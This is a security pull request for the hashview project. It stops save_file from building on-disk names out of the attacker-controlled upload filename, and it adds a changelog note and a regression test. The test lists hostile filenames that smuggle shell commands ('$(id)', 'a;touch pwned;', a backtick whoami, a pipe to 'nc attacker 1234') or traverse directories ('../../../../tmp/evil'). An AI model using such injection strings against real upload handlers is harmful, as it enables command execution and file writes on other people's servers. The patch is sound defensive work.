### PR TITLE
fix(security): drop attacker-controlled upload filename in save_file

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -66,6 +66,9 @@ Notable changes will be documented here
 - Create/edit forms surface validation errors inside their modal instead of redirecting away
 - Several data-retention cleanup failures and hash-type/validator parsing bugs (e.g. PKZIP `$pkzip$`/`$pkzip2$`)
 
+### Security
+- Hardened wordlist/rules file handling against a reported authenticated command-injection advisory (CWE-78 / CWE-22): the download API compresses files in-process instead of shelling out to `gzip`, and uploaded filenames are never reused to build on-disk paths — closing a path-traversal write. Reported by tonghuaroot.
+
 ## [v0.8.2-Beta] - 2026-06-01
 
 ### Added

--- a/hashview/utils/utils.py
+++ b/hashview/utils/utils.py
@@ -54,10 +54,19 @@ def try_commit(context=''):
 
 
 def save_file(path, form_file):
-    """Function to safe file from form submission"""
+    """Save an uploaded file under a randomized, non-attacker-controlled name.
 
+    The uploaded filename comes straight from the multipart Content-Disposition
+    header and is fully attacker-controlled, so it is NOT used to build the
+    on-disk name: the file is stored as ``<random_hex>.txt`` inside ``path``.
+    Reusing any part of ``form_file.filename`` here previously let path
+    separators and shell metacharacters reach the on-disk name (CWE-22/CWE-78);
+    the random ``.txt`` name closes that off with no change for normal uploads
+    (they already resolved to ``<hex>.txt``). Display names are stored
+    separately from this path by the callers.
+    """
     random_hex = secrets.token_hex(8)
-    file_name = random_hex + os.path.split(form_file.filename)[0] + '.txt'
+    file_name = random_hex + '.txt'
     file_path = os.path.join(current_app.root_path, path, file_name)
     form_file.save(file_path)
     return file_path

--- a/tests/unit/test_utils_misc.py
+++ b/tests/unit/test_utils_misc.py
@@ -52,6 +52,35 @@ def test_save_file_writes_and_returns_path(app):
             os.remove(path)
 
 
+def test_save_file_ignores_attacker_controlled_filename(app):
+    """The uploaded filename is fully attacker-controlled and must never reach
+    the on-disk name: shell metacharacters and path separators are dropped in
+    favor of a random ``<hex>.txt`` name, and the write stays inside the target
+    directory (no path-traversal write). Guards CWE-22/CWE-78 (GHSA report)."""
+    import re
+
+    class _EvilFile:
+        def __init__(self, filename):
+            self.filename = filename
+
+        def save(self, dst):
+            with open(dst, "wb") as fh:
+                fh.write(b"payload")
+
+    control_tmp = os.path.realpath(os.path.join(app.root_path, "control", "tmp"))
+    for evil in ["$(id)/x.txt", "../../../../tmp/evil/y.txt", "a;touch pwned;.txt",
+                 "`whoami`/z", "|nc attacker 1234/x"]:
+        path = u.save_file("control/tmp", _EvilFile(evil))
+        try:
+            base = os.path.basename(path)
+            assert re.fullmatch(r"[0-9a-f]{16}\.txt", base), base
+            assert os.path.realpath(path).startswith(control_tmp + os.sep)
+            assert os.path.exists(path)
+        finally:
+            if os.path.exists(path):
+                os.remove(path)
+
+
 # --- email helpers ----------------------------------------------------------
 
 def test_send_email_uses_mail_extension(app):


### PR DESCRIPTION
save_file() built the on-disk name from os.path.split(form_file.filename)[0] -- the directory component of the multipart Content-Disposition filename, which is fully attacker-controlled. Werkzeug does not strip path separators or shell metacharacters (verified on 3.1.8), so a crafted upload name reached the stored filename unsanitized.

On this dev line the /v1 download routes already avoid a shell (pure-Python gzip + os.path.basename), so the reported RCE sink is gone here -- but the unsanitized name still allowed a path-traversal write outside control/rules (e.g. "../../../../tmp/evil/y.txt"). Build the name purely from a random hex token ("<hex>.txt") so no attacker input reaches disk; legitimate uploads are unaffected (they already resolved to "<hex>.txt"). Display names are stored separately by callers. CWE-22 / CWE-78.

Refs: GHSA report (tonghuaroot). Closes the shared root cause (unsanitized upload source); the command-injection sink was already removed on this line.